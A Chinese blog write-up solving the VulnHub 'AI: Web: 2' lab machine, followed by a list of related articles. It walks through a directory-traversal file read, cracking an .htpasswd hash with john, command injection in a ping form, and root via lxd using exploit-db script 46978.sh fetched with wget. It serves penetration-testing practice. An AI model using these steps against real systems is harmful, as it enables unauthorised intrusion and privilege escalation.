AI: WEB: 2 WP

最新推荐文章于 2024-09-12 19:41:44 发布
最新推荐文章于 2024-09-12 19:41:44 发布
阅读量294 收藏
点赞数
文章标签: ssh 服务器 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37410729/article/details/130107390
版权

下载地址:https://www.vulnhub.com/entry/ai-web-2,357/

和1一样捏,拖入VMware打开,然后用kali扫arp得到靶机的ip地址,然后用nmap扫描端口
在这里插入图片描述
开启了80端口和22端口,开启22端口可能就是让我们拿到账户进行ssh了。

同样先去网站康康。
在这里插入图片描述
打开后是xuezhuli文件分享系统,但是没有可以点击的按钮。在exploit-db上可以搜到XuezhuLi FileSharing存在目录穿越漏洞,可以进行任意文件读取。

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
读了一些文件都是没用的,最后读到了apache的认证文件/etc/apache2/.htpasswd
在这里插入图片描述
可以看出这是一个用户名和密码,不过密码加密了,我么用john来破解一下,这里用的字典就是题目说明里提到的字典了在这里插入图片描述
字典地址:https://github.com/danielmiessler/SecLists/blob/master/Passwords/Leaked-Databases/rockyou-45.txt

在这里插入图片描述
用户名为aiweb2admin 密码为c.ronaldo
先尝试进行ssh登录,但是不是。那应该是别的地方的了。又没有头绪了,去扫一下网站目录吧。
在这里插入图片描述
扫到一个webadmin目录,而且需要登陆,试一下刚才的账户,成功登录。在这里插入图片描述
查看robots.txt又发现两个目录并且第一个目录是ping命令,立马想到命令注入。试了; & | 发现 | 可以进行命令注入

在这里插入图片描述
不过反弹shell和文件上传都失败了,那就翻翻文件吧,但是翻了半天也没翻到有用的,可能有隐藏文件吧

find / -name .*

在这里插入图片描述
找到一个可能有账户的文件,查看的到一个账户在这里插入图片描述
这次去ssh应该能登陆力
在这里插入图片描述
并且发现当前用户在lxd组,可以利用lxd进行提权
https://blog.csdn.net/qq_45290991/article/details/118436123

先利用kali的searchsploit搜索lxd在这里插入图片描述
然后将此脚本放入apache目录下方便后面wget

cp /usr/share/exploitdb/exploits/linux/local/46978.sh /var/www/html

然后从GitHub库下载构建好的Alpine:

git clone  https://github.com/saghul/lxd-alpine-builder.git

cd lxd-alpine-builder

./build-alpine

运行成功后出生成一个新的带有当前日期的tar.gz文件(如果运行失败可以试试开着vpn运行)

然后在靶机中利用wget下载46978.sh以及刚刚生成的tar.gz。

wget http://xxx.xxx.xxx.xxx/46978.sh

然后运行脚本

chmod 777 46978.sh
chmod 777 alpine-v3.17-i686-20230410_2356.tar.gz
./46978.sh -f alpine-v3.17-i686-20230410_2356.tar.gz

在这里插入图片描述
可能会爆这样的错误,sed -i "s/\r//" 46978.sh 运行此条命令即可解决。

在这里插入图片描述
在这里插入图片描述
overover!

SevenCold
关注
vulnhub靶机AI-Web2渗透笔记
liver100day的博客
07-24 2227
文章目录环境准备渗透过程1.信息收集1.1 主机发现1.2 端口扫描1.3 访问web网页(80端口)2.漏洞利用1 利用目录穿越(Directory Traversal)漏洞读取/etc/passwd2.利用暴力破解获取密码4 获得目标shell提权 环境准备 靶机环境搭建 攻击渗透机: kali IP地址:192.168.33.128 靶机:DC-7 IP地址未知 靶机下载地址:https://www.vulnhub.com/entry/ai-web-2,357/ 渗透过程 1.信息收集 1..
Y05 - 008、人工智能小程序:和计算机对话
吾心持剑,剑锋披靡
06-30 649
初学耗时:0.5h 注:CSDN手机端暂不支持章节内链跳转,但外链可用,更好体验还请上电脑端。 一、   1.1    1.2  记忆词:   ...  Y02 - 999、Python Web开发  ギ 舒适区ゾ || ♂ 累觉无爱 ♀ 一、   1.1 ~    1.2 ~      1.2.1 .       1.2.2 . &nb...
vulnhub靶场渗透系列-- AI:Web:2
lza20001103的博客
10-01 2870
vulnhub靶场渗透系列-- AI:Web:2
轻院课程 VulnHub-AI-web-2.0靶机渗透
最新发布
问芙的博客
09-12 993
文件读取:这里得熟悉Apache配置文件的路径,才知道应该读取什么文件join爆破:这里就得知道靶场给了字典的提示命令注入:这个得尝试怎么绕过,而且看到 ping ip 首先就要想到可能是命令注入命令注入查看隐藏文件:这个得知道隐藏文件一般都是(.)开头的这个靶场打的磕磕绊绊,读取配置文件的时候,不知道应该看哪些配置文件,或者说不知道那么多的路径。然后命令注入的时候,查看隐藏文件,这个一开始没想到,还是看了大佬的博客才想起来。后面的lxd提权,也遇到了一点小问题。
AI: Web: 2靶机-Walkthrough
ins1ght的博客
09-20 2373
AI: Web: 2靶机,中等难度靶机。目录爆破工具啊,漏扫工具啊每次还是多用几个,血的教训……
AI:WEB:02靶场题解
qq_42133828的博客
09-19 1306
AI:WEB:02靶场题解 前期准备 镜像下载 https://www.vulnhub.com/entry/ai-web-2,357/ 环境配置: 在VM以net连接打开虚拟机 使用的机器: 攻击机:kali linux 靶机:ip随配(192.168.203.136) 渗透开始 1.nmap发现主机,并扫描其ip信息, nmap --script=vuln 192.168.203.136 发现路...
ai-web2.0
longwanlian的博客
11-21 357
​ 1、目录扫描​ 2、目录遍历​ 3、命令执行​ 4、find命令此时已经是root权限了使用find命令查找flag[外链图片转存中…(img-5S5e5d5A-1700564874662)]最后在来一首cat查看​ 1、目录扫描​ 2、目录遍历​ 3、命令执行​ 4、find命令​ 5、lxd提权。
【Deepin Linux网络服务搭建】:Web与Mail服务器的构建与管理
[【Deepin Linux网络服务搭建】:Web与Mail服务器的构建与管理](https://cdn.shortpixel.ai/spai/q_lossy+ret_img+to_auto/linuxiac.com/wp-content/uploads/2022/06/dnf-install.png) # 1. Linux网络服务概述 在...
搜索算法与AI:Python智能化搜索升级指南
[Python搜索算法实例分析](https://media.geeksforgeeks.org/wp-content/uploads/AI-algos-1-e1547043543151.png) # 1. 搜索算法的基本概念与原理 搜索算法是计算机科学中用于查找数据项或路径的算法,广泛应用于...
【Popen2在Web开发中大显身手】:打造高效后端服务
[【Popen2在Web开发中大显身手】:打造高效后端服务](https://linuxhint.com/wp-content/uploads/2021/10/3-55.jpg) # 1. Popen2与Web开发的邂逅 在现代Web开发中,后端服务的效率和灵活性成为了提升用户体验和保证...
【hotshot在Web性能监控中的作用】:提升Web服务性能的关键步骤
[【hotshot在Web性能监控中的作用】:提升Web服务性能的关键步骤](https://theonlineadvertisingguide.com/wp-content/uploads/Core-Web-Vitals-rankings-min.png) # 1. Web性能监控的重要性 在互联网技术日新月异...
AI-Web-2.0
底层社会中的弱智
08-08 849
小总结: 目录遍历漏洞常见的位置,例如在前端中看到某些image标签<img src=/images?file=png>,那么这里就可能存在任意文件读取漏洞。当时看到这个框架存在任意文件读取漏洞,我就在想如果没有其他漏洞可以进行组合利用,我如何最大化的利用任意文件读取? 那就是利用默认的配置路径进行配置信息的读取,尽可能多的获得配置信息。 所以在在即搭建网站的时候要修改默认的端口,默认的路径,默认的密码,这些都是潜在的危险。 判断中间件的版本信息然后根据对应版本信息的默认路径进行文件读取。
实战项目之AIWEB2靶场渗透
胖虎的博客
11-05 1474
AIweb2靶场渗透测试
vulnhub靶场AI-WEB-1.0
qq_42307546的博客
05-03 636
靶机下载地址 https://download.vulnhub.com/aiweb/AI-Web-1.0.7z 主机探测 netdiscover -i eth0 -r 192.168.1.0/24 端口探测 nmap -p 1-65535 -sC -sV 192.168.1.14 开启了80端口访问 web目录爆破 gobuster dir -u http://192.168.1.14 -w /usr/share/wordlists/dirbuster/directory-list-2.3-m
AI-WEB-2.0 靶机实录
gaopan2667002的博客
09-01 341
file_name=../../../../../../../../../../../../..//etc/apache2/.htpasswd获取到passwd文件。下是否存在robots.txt,如果存在,搜索机器人就会按照该文件中的内容来确定访问的范围;这个文件告诉来访的搜索引擎哪些房间可以进入和参观,哪些房间因为存放贵重物品,或可能涉及住户及访客的隐私而不对搜索引擎开放。的内容时,才需要使用robots.txt文件。--从哪里获取到的这个apache文件的位置,为什么要获取该文件。
VulnHub靶机 - AI:Web 2.0
狂吃三碗
04-28 611
VulnHub靶机 - AI:Web 2.0
VulnHub靶场之AI Web 2.0
A_dmin的博客
06-26 1568
VulnHub靶场之AI Web 2.0 用vm打开靶机,运行kali和靶机 首先肯定查看kali的ip地址,然后使用nmap命令:nmap -sP 192.168.80.0/24扫描主机: 接下来扫描端口,nmap:nmap -p 1-65535 -sV 192.168.80.129: 开放了ssh端口和http端口~~ 老样子,先不管ssh端口,先去看看web网站,,, 发现需要登录,,,...
AI-WEB-1.0靶机教程
qq_42553928的博客
04-06 6727
文章目录靶机概况下载地址靶机描述Description靶机信息靶机界面网卡信息信息收集主机发现端口扫描命令过程端口详情网站信息网站首页目录爆破敏感目录扫描m3diNf0目录se3reTdir777目录漏洞映射SQLI渗透过程SQLI漏洞利用查看我是谁创建一个名为webshell.php的文件下载文件到靶机运行上传的文件提权 靶机概况 下载地址 https://www.vulnhub.com/entry/ai-web-1,353/ 靶机描述 Description Difficulty: Intermedi
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值